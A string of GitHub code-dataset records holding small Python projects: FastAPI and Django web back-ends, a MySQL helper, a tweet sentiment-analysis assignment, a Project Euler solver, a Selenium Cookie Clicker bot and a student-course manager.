post.published, str(id),))\n # updated_post = cursor.fetchone()\n # if not updated_post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n # conn.commit()\n \n # # code to serialize the post object of db to dictionary\n # columnNames = [column[0] for column in cursor.description]\n # updated_post = dict(zip( columnNames , updated_post ))\n \n # return updated_post\n \n post_query = db.query(models.Post).filter(models.Post.id == id)\n \n update_post = post_query.first()\n \n if not update_post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n if current_user.id != update_post.owner_id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=\"Not authurized to perform this action\")\n \n post_query.update(post.dict(), synchronize_session= False)\n \n db.commit()\n \n return post_query.first()\n\n@router.delete('/{id}', status_code = status.HTTP_204_NO_CONTENT)\ndef delete(id: int, db: Session = Depends(get_db), current_user: models.User = Depends(oath2.get_current_user)):\n # cursor.execute(\"\"\" DELETE FROM posts WHERE id = %s returning *\"\"\",(str(id),))\n # deleted_post = cursor.fetchone()\n # if not deleted_post:\n # raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n # conn.commit()\n # return Response(status_code=status.HTTP_204_NO_CONTENT)\n post_query = db.query(models.Post).filter(models.Post.id == id)\n \n post = post_query.first()\n \n if not post:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=f\"post with id: {id} was not found\")\n \n if current_user.id != post.owner_id:\n raise HTTPException(status_code=status.HTTP_403_FORBIDDEN, detail=\"Not authurized to perform this action\")\n \n post_query.delete(synchronize_session= False)\n \n db.commit()\n \n return Response(status_code=status.HTTP_204_NO_CONTENT)\n","repo_name":"shivankur-code/fastapi-project","sub_path":"app/routers/post.py","file_name":"post.py","file_ext":"py","file_size_in_byte":5914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17122797367","text":"#! 
/usr/bin/env python\n# coding = utf-8\nimport pymysql\n\n\nclass MySQLHelper(object):\n\n    def __init__(self, host='localhost', db='tatel'):\n        self.__host = host\n        self.__db = db\n        # self.__cursor_class = cursor_class\n        self.__Conn = pymysql.Connection(host=self.__host, user='root', password='1234', db=self.__db,)\n\n    def get_one(self, sql, params):\n        try:\n            cursor = self.__Conn.cursor()\n            cursor.execute(sql, params)\n            data = cursor.fetchone()\n            cursor.close()\n            return data\n        except Exception as e:\n            print('get_one(), Error:', e)\n\n    def get_all(self, sql, params):\n        try:\n            cursor = self.__Conn.cursor()\n            cursor.execute(sql, params)\n            data = cursor.fetchall()\n            cursor.close()\n            return data\n        except Exception as e:\n            print('get_all() Error', e)\n\n    def insert_into(self, sql, params):\n        try:\n            cursor = self.__Conn.cursor()\n            cursor.execute(sql, params)\n            self.__Conn.commit()\n            cursor.close()\n        except Exception as e:\n            self.__Conn.rollback()\n            print(e)\n        else:\n            return 1\n\n    def original_execute(self, sql):\n        try:\n            cursor = self.__Conn.cursor()\n            cursor.execute(sql)\n            self.__Conn.commit()\n            cursor.close()\n            return 1\n        except Exception as e:\n            self.__Conn.rollback()\n            print(e)\n\n    def __del__(self):\n        self.__Conn.close()\n\nif __name__ == '__main__':\n    helper = MySQLHelper()\n    # sql = '''create table user(id INT , username VARCHAR (20));'''\n    # helper.original_execute(sql)\n    sql = '''select * from user'''\n    helper.original_execute(sql)\n","repo_name":"TatelZhang/SomeCode","sub_path":"Daily/0629/sql_class.py","file_name":"sql_class.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25850733527","text":"import pickle\nimport os\nimport numpy as np\n\ndata_source = '/home/erik/Github/exjobb_resultat/data/'\n\n\ndef load_specific_score(filename = None, dataset = None, algorithm = None):\n    # assert dataset in (\"prosivic\", \"dreyeve\")\n    # assert algorithm in (\"DSVDD\", \"GPND\", \"ALOCC\")\n    if filename is None:\n        filepath = os.path.join(data_source,\"%s_%s.pkl\"%(dataset, algorithm))\n    else:\n        filepath = os.path.join(data_source,filename)\n    try:\n        with open(filepath,'rb') as f:\n            scores, labels = pickle.load(f)\n    except:\n        with open(filepath,'rb') as f:\n            scores, labels = pickle.load(f, encoding='latin1')\n\n    return scores, labels\n\ndef load_all_scores():\n    print(\"Loading all results\")\n    results = {}\n    key_it = 0\n    for filename in os.listdir(data_source):\n        if \".pkl\" in filename:\n            tags = filename.replace('.pkl','').split(\"_\")\n            dataset = tags[0]\n            algorithm = tags[1]\n            outlier_name = tags[-1]\n            alg_spec_name = tags[2]\n\n            print(\"Result %d: dataset %s, algorithm %s, outliers are %s, name %s\"%(key_it,dataset,algorithm,outlier_name,alg_spec_name))\n            key = \"result%d\"%key_it\n            results[key] = {}\n            results[key][\"dataset\"] = dataset\n            results[key][\"algorithm\"] = algorithm\n            results[key][\"outlier_name\"] = outlier_name\n            scores, labels = load_specific_score(filename = filename)\n            labels = np.array([int(x) for x in labels])  # np.int was removed in NumPy 1.24; the builtin int is equivalent here\n            results[key][\"scores\"] = scores\n            results[key][\"labels\"] = labels\n            print(\"Successfully loaded results for {:<10} : {:<15}\".format(dataset, algorithm))\n            key_it += 1\n    return results\n\n# def load_all_scores():\n#     print(\"Loading all results\")\n#     results = {}\n#     key_it = 0\n#     common_results_dict = pickle.load(open('/home/erik/Github/exjobb_resultat/data/name_dict.pkl','rb'))\n#     for i_dataset, experiments in common_results_dict.items():\n#         for i_algorithm, experiment in 
experiments.items():\n# key = \"result%d\"%key_it\n# results[key] = {}\n# results[key][\"dataset\"] = i_dataset\n# results[key][\"algorithm\"] = i_algorithm\n\n# scores, labels = load_specific_score(dataset = i_dataset, algorithm = i_algorithm)\n# labels = np.array([np.int(x) for x in labels])\n# results[key][\"scores\"] = scores\n# results[key][\"labels\"] = labels\n \n# key_it += 1\n\n# print(\"Successfully loaded results for {:<10} : {:<15}\".format(i_dataset, i_algorithm))\n# return results\n\ndef separate_in_and_out(scores, labels, outlier_label = 1):\n \n inlier_idx = np.where(labels != outlier_label)[0]\n outlier_idx = np.where(labels==outlier_label)[0]\n scores = (scores-np.amin(scores))\n # scores = scores / np.amax(scores)\n # print(labels)\n # print(scores)\n # print(inlier_idx)\n # Classwise scores\n inlier_scores = scores[inlier_idx]\n outlier_scores = scores[outlier_idx]\n\n return inlier_scores, outlier_scores, inlier_idx, outlier_idx\n\n# def show_all_stored_experiments():\n# common_results_dict = pickle.load(open('/home/erik/Github/exjobb_resultat/data/name_dict.pkl','rb'))\n# print(\"Experiments with stored results:\\n\")\n# print(\"\\t{:<10} {:<15} {:<30}\".format(\"Dataset\",\"Algorithm\", \"Experiment name\"))\n# datasets = []\n# algorithms = []\n# for dataset, experiments in common_results_dict.items():\n# datasets.append(dataset)\n# for algorithm, exp_name in experiments.items():\n# algorithms.append(algorithm.lower())\n# print(\"\\t{:<10} {:<15} {:<30}\".format(dataset, algorithm, exp_name))\n \n# return datasets, algorithms","repo_name":"KratzErik/exjobb_resultat","sub_path":"utils/unpickle_scores.py","file_name":"unpickle_scores.py","file_ext":"py","file_size_in_byte":3785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6985849692","text":"# Function that reads the file names\r\ndef readFiles (fileName):\r\n inFile = open (fileName, \"r\", encoding='utf-8')\r\n return inFile\r\n\r\n# Function that reads the keyword files and stores the keywords in a set\r\ndef readKeywords (keywordFiles, check):\r\n # Each set represent different keywords depending on their sentiment values\r\n negative = set ()\r\n positive = set ()\r\n neutral = set ()\r\n expressions = set ()\r\n\r\n # Iterates through each line in keyword file\r\n for line in keywordFiles:\r\n sentimentValue = line.split(\",\") # split each line by the comma\r\n sentimentValue [1] = int (sentimentValue [1].rstrip(\"\\n\")) # Getting rid of whitespace and obtaining the sentiment value\r\n if sentimentValue [1] == 10:\r\n positive.add (sentimentValue[0])\r\n elif sentimentValue [1] == 1:\r\n negative.add (sentimentValue[0])\r\n elif sentimentValue [1] == 7:\r\n neutral.add (sentimentValue[0])\r\n else:\r\n expressions.add (sentimentValue[0])\r\n\r\n # Closes the file before iterating through each line in the file again\r\n keywordFiles.close()\r\n\r\n # returns the keyword sets\r\n if check == 1:\r\n return positive\r\n elif check == 2:\r\n return negative\r\n elif check == 3:\r\n return neutral\r\n else:\r\n return expressions\r\n\r\n# This function determines the timezone/region the tweet came from\r\ndef getTimeZone (tweetFiles):\r\n timeZoneList = []\r\n\r\n\r\n for line in tweetFiles:\r\n line = line.strip() # Strips off any whitespace from either end of each tweet\r\n splitLine = line.split(\"]\") # splits the tweet into the latitude/longitude and the rest of the tweet\r\n splitLine.pop (1)\r\n for word in splitLine:\r\n word = 
word.lstrip(\"[\") # gets rid of the left bracket\r\n word = word.split(\", \")\r\n if len(word) == 2:\r\n latitude = float (word [0])\r\n longitude = float (word [1])\r\n # Determines the region of the tweet based on the latitude/longitude\r\n if 24.660845 <= latitude < 49.189787:\r\n if -87.518395 <= longitude < -67.444574:\r\n timeZoneList.append(\"Eastern\")\r\n if -101.998892 <= longitude < -87.518395:\r\n timeZoneList.append(\"Central\")\r\n if -115.236428 <= longitude < -101.998892:\r\n timeZoneList.append(\"Mountain\")\r\n if -125.242264 <= longitude < -115.236428:\r\n timeZoneList.append(\"Pacific\")\r\n else:\r\n timeZoneList.append(\"None\")\r\n return timeZoneList\r\n\r\n# Function that returns the happiness score of every single tweet, each element corresponds\r\n# to the happiness score from a single tweet in the file\r\ndef readTweets (tweetsFiles,positiveWords,negativeWords,neutralWords,expressionWords):\r\n numberofKeywords = 0\r\n PUNC = \".?!#@\"\r\n sentiment = 0\r\n sentimentLst = []\r\n\r\n for line in tweetsFiles:\r\n line = line.strip() # Strips off any whitespace from either end of each tweet\r\n splitLine = line.split() # splits the tweet into words based off whitespace\r\n\r\n for word in splitLine:\r\n word = word.strip () # Strips off any whitespace from either end of each word\r\n word = word.strip(PUNC) # Removes any punctuation from beginning and end of the word\r\n word = word.lower() # Converts the word into lower case letters\r\n if word in positiveWords:\r\n sentiment += 10\r\n numberofKeywords +=1\r\n if word in neutralWords:\r\n sentiment += 7\r\n numberofKeywords += 1\r\n if word in negativeWords:\r\n sentiment += 1\r\n numberofKeywords += 1\r\n if word in expressionWords:\r\n sentiment += 5\r\n numberofKeywords += 1\r\n if numberofKeywords!= 0:\r\n sentimentLst.append(sentiment//numberofKeywords)\r\n else:\r\n sentimentLst.append(-1)\r\n sentiment = 0\r\n numberofKeywords = 0\r\n return sentimentLst\r\n\r\n# Function that returns the tuple for each region containing:\r\n# The average happinness value\r\n# Number of keywords tweets\r\n# Number of tweets\r\ndef regionTuple (happinessScoreTweets,time_zones, check2):\r\n sumEasternHappinessScore = 0\r\n sumCentralHappinessScore = 0\r\n sumMountainHappinessScore = 0\r\n sumPacificHappinessScore = 0\r\n\r\n numEasternKeywordTweets = 0\r\n numCentralKeywordTweets = 0\r\n numMountainKeywordTweets = 0\r\n numPacificKeywordTweets = 0\r\n\r\n\r\n numEasternTweets = 0\r\n numCentralTweets = 0\r\n numMountainTweets = 0\r\n numPacificTweets = 0\r\n\r\n index = 0\r\n\r\n # Adds the sum of the happiness score for each region and counts the number of tweets in that region\r\n for region in time_zones:\r\n if region == \"Eastern\":\r\n if happinessScoreTweets [index] != -1:\r\n sumEasternHappinessScore += happinessScoreTweets [index]\r\n numEasternKeywordTweets+=1\r\n numEasternTweets +=1\r\n else:\r\n numEasternTweets+=1\r\n\r\n if region == \"Central\":\r\n if happinessScoreTweets [index]!=-1:\r\n sumCentralHappinessScore += happinessScoreTweets[index]\r\n numCentralKeywordTweets += 1\r\n numCentralTweets+=1\r\n else:\r\n numCentralTweets+=1\r\n if region == \"Mountain\":\r\n if happinessScoreTweets [index]!= -1:\r\n sumMountainHappinessScore+= happinessScoreTweets[index]\r\n numMountainKeywordTweets += 1\r\n numMountainTweets +=1\r\n else:\r\n numMountainTweets +=1\r\n if region == \"Pacific\":\r\n if happinessScoreTweets [index]!= -1:\r\n sumPacificHappinessScore += happinessScoreTweets [index]\r\n 
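# the scores summed here come from readTweets, which gives each tweet the integer mean of its keyword values: e.g. one positive (10) plus one neutral (7) keyword yields (10 + 7) // 2 = 8, while -1 marks a tweet containing no keywords at all\r\n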
numPacificKeywordTweets += 1\r\n numPacificTweets +=1\r\n else:\r\n numPacificTweets +=1\r\n index +=1\r\n\r\n # Computes the average happiness value for each region\r\n if numEasternKeywordTweets!=0:\r\n averageEasternHappinnesValue = sumEasternHappinessScore/numEasternKeywordTweets\r\n else:\r\n averageEasternHappinnesValue = 0\r\n if numCentralKeywordTweets != 0:\r\n averageCentralHappinnesValue = sumCentralHappinessScore/numCentralKeywordTweets\r\n else:\r\n averageCentralHappinnesValue = 0\r\n if numMountainKeywordTweets!= 0:\r\n averageMountainHappinessValue = sumMountainHappinessScore/numMountainKeywordTweets\r\n else:\r\n averageMountainHappinessValue = 0\r\n if numPacificKeywordTweets!=0:\r\n averagePacificHappinessValue = sumPacificHappinessScore/numPacificKeywordTweets\r\n else:\r\n averagePacificHappinessValue = 0\r\n\r\n # returns the tuple with the three aforementioned parameters (check comment above the function)\r\n easternTuple = (averageEasternHappinnesValue,numEasternKeywordTweets,numEasternTweets)\r\n centralTuple = (averageCentralHappinnesValue,numCentralKeywordTweets,numCentralTweets)\r\n mountainTuple = (averageMountainHappinessValue,numMountainKeywordTweets,numMountainTweets)\r\n pacificTuple = (averagePacificHappinessValue,numPacificKeywordTweets,numPacificTweets)\r\n\r\n if check2 == 1:\r\n return easternTuple\r\n if check2 == 2:\r\n return centralTuple\r\n if check2 == 3:\r\n return mountainTuple\r\n if check2 == 4:\r\n return pacificTuple\r\n\r\n\r\n\r\n# processes the tweets using all the above function\r\ndef compute_tweets(fileTweets,fileKeywords):\r\n\r\n # returns an empty list if a file not found exception was found\r\n emptylist = [(0,0,0),(0,0,0),(0,0,0),(0,0,0)]\r\n try:\r\n # Stores keywords and their sentiment values into 4 sets\r\n positiveSet = readKeywords(readFiles(fileKeywords), 1)\r\n negativeSet = readKeywords(readFiles(fileKeywords), 2)\r\n neutralSet = readKeywords(readFiles(fileKeywords), 3)\r\n expressionSet = readKeywords(readFiles(fileKeywords), 4)\r\n except:\r\n return emptylist\r\n\r\n\r\n # list that contains the happiness score of every single tweet, each element corresponds\r\n # to a happiness score from a single tweet in the file\r\n tweetsHappinesScore = readTweets(readFiles(fileTweets),positiveSet,negativeSet,neutralSet,expressionSet)\r\n\r\n # list that contains the timezones of every single tweet, each element corresponds to\r\n # a timezone froma single tweet in the file\r\n timezones = getTimeZone(readFiles(fileTweets))\r\n\r\n # Returns a tuple with average happiness value for that region\r\n # along with the number of tweets in that region with keywords\r\n # along with the number of tweets in that region overall\r\n eastern = regionTuple(tweetsHappinesScore,timezones,1)\r\n central = regionTuple(tweetsHappinesScore,timezones,2)\r\n mountain = regionTuple(tweetsHappinesScore,timezones,3)\r\n pacific = regionTuple(tweetsHappinesScore,timezones,4)\r\n\r\n lst = [eastern,central,mountain,pacific]\r\n return lst\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"jespinal-uwo/CS-1026","sub_path":"Assignment-3/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":9131,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41903859981","text":"from rest_framework import serializers\nfrom pesticide_app.models import Reactor\n\n\nclass ReactorSerializer(serializers.ModelSerializer):\n reacter_details = 
serializers.SerializerMethodField('reacterDetails')\n comment_details = serializers.SerializerMethodField('commentDetails')\n\n def reacterDetails(self, obj):\n details = {\n 'id': obj.user.id,\n 'name': obj.user.name,\n 'enrollment_number': obj.user.enrollment_number,\n }\n return details\n\n def commentDetails(self, obj):\n details = {\n 'id': obj.comment.id,\n 'issue_id': obj.comment.issue.id,\n 'project_id': obj.comment.issue.project.id,\n 'project_name': obj.comment.issue.project.name,\n }\n return details\n\n class Meta:\n model = Reactor\n fields = '__all__'\n","repo_name":"MihirSachdeva/pesticide-docker","sub_path":"pesticide_backend/src/pesticide_app/api/serializers/reactor.py","file_name":"reactor.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"4175531460","text":"from datetime import date\nfrom random import randrange\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom model_bakery import baker\n\nfrom applications.courses.models import Subject, Course\n\nUser = get_user_model()\n\n\nclass SubjectTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n test_subject = Subject.objects.create(name='Subject_1')\n test_subject.save()\n\n def test_subject_lowercase_name(self):\n subject = Subject.objects.get(name='subject_1')\n self.assertTrue(subject.name.islower())\n\n\nclass CourseTestCase(TestCase):\n\n @classmethod\n def setUpTestData(cls):\n test_teacher = User.objects.create_user(email='teacher@gmail.com', password='mrrobot990')\n test_teacher.save()\n test_subject = Subject.objects.create(name='Subject_1')\n test_subject.save()\n test_courses = baker.make('courses.Course', teacher=test_teacher, status='online',\n subject=test_subject, available_places=10, discount=20,\n start_date=date(2023, 1, 10), end_date=date(2023, 1, 30),\n price=1000, _quantity=5)\n assert test_courses\n\n def test_course_title_max_length(self):\n courses = Course.objects.all()\n title_max_length = courses[0]._meta.get_field('title').max_length\n self.assertEqual(title_max_length, 180)\n\n def test_course_language_max_length(self):\n course = Course.objects.all()\n language_max_length = course[0]._meta.get_field('language').max_length\n self.assertEqual(language_max_length, 50)\n\n def test_course_availability(self):\n course = Course.objects.all()\n self.assertTrue(course[0].is_available)\n\n def test_course_final_price(self):\n course = Course.objects.all()\n self.assertEqual(course[0].final_price, 800)\n","repo_name":"aliiavgh/courses_team_hackathon","sub_path":"applications/courses/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37029590822","text":"import time\nimport math\n\ndef calc(x, num) :\n t = 0\n p = 1\n k = 1\n sqx = int(math.sqrt(x))\n cnt = 0\n a = 0\n while 1:\n a = (t + sqx * k) // p\n right = (a * p - t)\n np = k * k * x - right * right\n d = math.gcd(np, p)\n np = np // d\n p = p // d\n nk = k * p\n nt = right * p\n p = np\n t = nt\n k = nk\n cnt = cnt + 1\n num = num - 1\n if num == 0:\n break\n return a\n\ndef issq(x):\n sq = int(math.sqrt(x))\n return sq * sq == x or (sq + 1) * (sq + 1) == x\n\ndef compute(n) :\n p = 0;\n while True:\n p = p + 1\n fz = 1\n fm = 0\n for i in range(p, 0, -1):\n tmp = fz\n fz = fm\n fm = tmp\n nfz = calc(n, i) * fm + fz\n nfm = fm\n d = 
math.gcd(nfm, nfz)\n fz = nfz // d\n fm = nfm // d\n # fz/fm is now the depth-p continued-fraction convergent of sqrt(n);\n # stop once it gives the fundamental solution of Pell's equation x^2 - n*y^2 = 1\n if fz * fz - n * fm * fm == 1:\n return fz\n\n# search n <= 1000 for the largest minimal x in x^2 - n*y^2 = 1 (Project Euler 66)\ndef solve():\n mx = 0\n mxp = 0\n for n in range(1, 1001, 1):\n if issq(n):\n continue\n res = compute(n)\n if res > mx:\n mx = res\n mxp = n\n print(\"ans: \" + str(mxp))\n\ntime_start = time.time()\nsolve()\ntime_end = time.time()\nprint('time passed:', time_end-time_start, 's')","repo_name":"LxFee/ProjectEuler-Solutions","sub_path":"66/66.py","file_name":"66.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"70391508212","text":"from django.urls import path\nfrom .views import RecipeListAPIView, RecipeListCreateAPIView, RecipieDetailChangeAPIView, StepDetailList, RecipeStepsList, IngredientList, IngredientEditList\n\nurlpatterns = [\n path('ingredients/<int:pk>/user/', IngredientEditList.as_view()),\n path('ingredients/user/', IngredientList.as_view()),\n path('recipes/<int:pk>/step/<int:step_pk>/', StepDetailList.as_view()),\n path('recipes/<int:pk>/step/', RecipeStepsList.as_view(), name = 'recipe_steps'),\n path('recipes/<int:pk>/user/', RecipieDetailChangeAPIView.as_view()),\n path('recipes/user/', RecipeListCreateAPIView.as_view()),\n path('recipes/', RecipeListAPIView.as_view()),\n]","repo_name":"DanielSJuarez/batch-maker-app","sub_path":"recipes/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6889504743","text":"import os\nimport numpy as np\nimport plotly\nimport plotly.graph_objs as go\n\nimport utils.io as io\n\n\ndef create_scatter_plot(del_confmat,visual_sim,glove_sim,labels,filename):\n mean_glove_sim = np.mean(glove_sim)\n std_glove_sim = np.std(glove_sim)\n text = []\n x = []\n y = []\n for i, label1 in enumerate(labels):\n for j, label2 in enumerate(labels):\n round_glove_sim = str(round(glove_sim[i,j],2))\n text.append(\n f'{label1} / {label2} (glove: {round_glove_sim})')\n x.append(visual_sim[i,j])\n y.append(del_confmat[i,j])\n\n trace = go.Scatter(\n x = x,\n y = y,\n mode = 'markers',\n text = text)\n\n layout = go.Layout(\n xaxis = dict(\n title = 'Visual Similarity'\n ),\n yaxis = dict(\n title = 'Conf Visual - Conf Glove'\n ),\n hovermode = 'closest'\n )\n\n plotly.offline.plot(\n {'data': [trace],'layout': layout},\n filename=filename,\n auto_open=False)\n \n\n\ndef main(exp_const,data_const):\n visual_confmat = np.load(data_const.visual_confmat_npy)\n glove_confmat = np.load(data_const.glove_confmat_npy)\n visual_embed = np.load(data_const.visual_embed_npy)\n labels = np.load(data_const.labels_npy)\n\n glove_vecs = visual_embed[:,:data_const.glove_dim]\n visual_vecs = visual_embed[:,data_const.glove_dim:]\n visual_sim = np.matmul(visual_vecs,np.transpose(visual_vecs))\n glove_sim = np.matmul(glove_vecs,np.transpose(glove_vecs))\n\n visual_confmat = np.maximum(0,np.log(visual_confmat+1e-6))\n glove_confmat = np.maximum(0,np.log(glove_confmat+1e-6))\n del_confmat = visual_confmat - glove_confmat\n\n filename = os.path.join(exp_const.vis_dir,'conf_vs_visual_sim.html')\n\n create_scatter_plot(del_confmat,visual_sim,glove_sim,labels,filename)\n\n\n","repo_name":"BigRedT/vico","sub_path":"exp/cifar100/vis/conf_vs_visual_sim.py","file_name":"conf_vs_visual_sim.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"7980590263","text":"# Libraries needed to automate CookieClicker\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.common.by import By\r\nimport keyboard\r\nimport time\r\n\r\n# Webdriver path and site URL\r\n# PATH = "C:/ChromeWebdriver/chromedriver.exe"\r\nURL = \"https://orteil.dashnet.org/cookieclicker/\"\r\n\r\n# Opening the site\r\nwith webdriver.Chrome() as driver: \r\n time.sleep(2)\r\n driver.get(URL)\r\n time.sleep(2)\r\n\r\n # Selecting Brazilian Portuguese as the game language\r\n try:\r\n idioma = driver.find_element(By.ID, \"langSelect-PT-BR\")\r\n idioma.click()\r\n finally:\r\n print('Language selected')\r\n # Locating the cookie's HTML element.\r\n bigCookie = driver.find_element(By.ID, \"bigCookie\")\r\n\r\n # Game loop\r\n while True:\r\n # Clicking repeatedly\r\n for i in range(20):\r\n bigCookie.click()\r\n \r\n # Conditionally buy items\r\n try:\r\n items = driver.find_elements(By.CLASS_NAME, \"enabled\") # Store the available items in a list\r\n time.sleep(0.5) # Time to 'farm' cookies before making another purchase\r\n items[-1].click() # Pick the most expensive one\r\n except:\r\n pass\r\n if keyboard.is_pressed(\"q\"): # Press to quit the game\r\n break\r\n\r\nprint('Game Over')\r\ntime.sleep(2)\r\n","repo_name":"arnonhbcs/TreinamentoJr2023","sub_path":"clicker.py","file_name":"clicker.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39733600345","text":"from typing import List\n\nfrom app.internal.repository import UserRepository\nfrom app.internal.schemes import (\n CreateUserCommand,\n DeleteUserCommand,\n GetUserCommand,\n Success,\n UpdateUserCommand,\n UserModel,\n)\n\nfrom .base import BaseService\n\n\nclass UserService(\n BaseService[\n UserModel,\n CreateUserCommand,\n GetUserCommand,\n UpdateUserCommand,\n DeleteUserCommand,\n ]\n):\n repository: UserRepository\n\n def __init__(self, repository: UserRepository) -> None:\n super().__init__()\n self.repository = repository\n\n async def create(self, cmd: CreateUserCommand) -> UserModel:\n result = await self.repository.create(cmd=cmd)\n return UserModel.from_orm(result)\n\n async def get_all(self, skip: int = 0, limit: int = 100) -> List[UserModel]:\n result = await self.repository.get_all(skip=skip, limit=limit)\n return [UserModel.from_orm(row) for row in result]\n\n async def get(self, cmd: GetUserCommand) -> UserModel:\n result = await self.repository.get(cmd=cmd)\n return UserModel.from_orm(result)\n\n async def delete(self, cmd: DeleteUserCommand) -> Success:\n await self.repository.delete(cmd=cmd)\n return Success()\n\n async def update(self, cmd: UpdateUserCommand) -> Success:\n raise NotImplementedError\n","repo_name":"mirea-ninja/online-quest-backend","sub_path":"app/internal/service/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29846604870","text":"import uuid\r\n\r\nclass Course:\r\n def __init__(self, course_name, course_mark):\r\n self.course_id = str(uuid.uuid4())\r\n self.course_name = course_name\r\n self.course_mark = course_mark\r\n\r\n\r\ncourse_name = input(\"Enter course name: \")\r\ncourse_mark = float(input(\"Enter course mark: \"))\r\n\r\ncourse = Course(course_name, course_mark)\r\n\r\nprint(\"Course ID:\", course.course_id)\r\nprint(\"Course Name:\", course.course_name)\r\nprint(\"Course Mark:\", course.course_mark)\r\n\r\nclass Student:\r\n
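\"\"\"One student, identified by a generated UUID, with a list of enrolled Course objects.\r\n\r\n Illustrative doctest (hypothetical values; the module-level input() prompts above run first when this file executes):\r\n\r\n >>> s = Student(\"Ada\", 20, \"S001\")\r\n >>> s.enroll_course(Course(\"Math\", 90.0))\r\n >>> s.get_student_average()\r\n 90.0\r\n \"\"\"\r\n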
total_students = 0\r\n\r\n def __init__(self, student_name, student_age, student_number):\r\n self.student_id = str(uuid.uuid4())\r\n self.student_name = student_name\r\n self.student_age = student_age\r\n self.student_number = student_number\r\n self.courses_list = []\r\n Student.total_students += 1\r\n\r\n def enroll_course(self, course):\r\n self.courses_list.append(course)\r\n\r\n def get_student_details(self):\r\n return self.__dict__\r\n\r\n def get_student_courses(self):\r\n for course in self.courses_list:\r\n print(\"Course Name:\", course.course_name)\r\n print(\"Course Mark:\", course.course_mark)\r\n print()\r\n\r\n def get_student_average(self):\r\n total_marks = sum(course.course_mark for course in self.courses_list)\r\n average = total_marks / len(self.courses_list) if self.courses_list else 0\r\n return average\r\n\r\n\r\nstudents = [] # TODO 8 declare empty students list\r\n\r\nwhile True:\r\n try:\r\n selection = int(input(\"1. Add New Student\\n\"\r\n \"2. Delete Student\\n\"\r\n \"3. Display Student\\n\"\r\n \"4. Get Student Average\\n\"\r\n \"5. Add Course to Student with Mark\\n\"\r\n \"6. Exit\\n\")) # TODO 9 handle Exception for selection input\r\n\r\n if selection == 1:\r\n student_number = input(\"Enter Student Number: \")\r\n\r\n # TODO 10 make sure that Student number is not exists before\r\n existing_student = next((student for student in students if student.student_number == student_number), None)\r\n if existing_student:\r\n print(\"Student Number already exists. Please try again.\")\r\n continue\r\n\r\n student_name = input(\"Enter Student Name: \")\r\n while True:\r\n try:\r\n student_age = int(input(\"Enter Student Age: \"))\r\n break\r\n except ValueError:\r\n print(\"Invalid Value\")\r\n\r\n new_student = Student(student_name, student_age, student_number) # TODO 11 create student object\r\n students.append(new_student)\r\n\r\n print(\"Student Added Successfully\")\r\n\r\n elif selection == 2:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n students.remove(target_student)\r\n print(\"Student Deleted Successfully\")\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 3:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n print(\"Student Details:\")\r\n print(target_student.get_student_details())\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 4:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n average = target_student.get_student_average()\r\n print(\"Student Average:\", average)\r\n else:\r\n print(\"Student Not Found\")\r\n\r\n elif selection == 5:\r\n student_number = input(\"Enter Student Number: \")\r\n target_student = None\r\n\r\n for student in students:\r\n if student.student_number == student_number:\r\n target_student = student\r\n break\r\n\r\n if target_student:\r\n course_name = input(\"Enter Course Name: \")\r\n course_mark = float(input(\"Enter Course Mark: \"))\r\n new_course = Course(course_name, course_mark)\r\n target_student.enroll_course(new_course)\r\n 
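# e.g. after enrolling marks 80.0 and 90.0, menu option 4 reports (80.0 + 90.0) / 2 = 85.0\r\n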
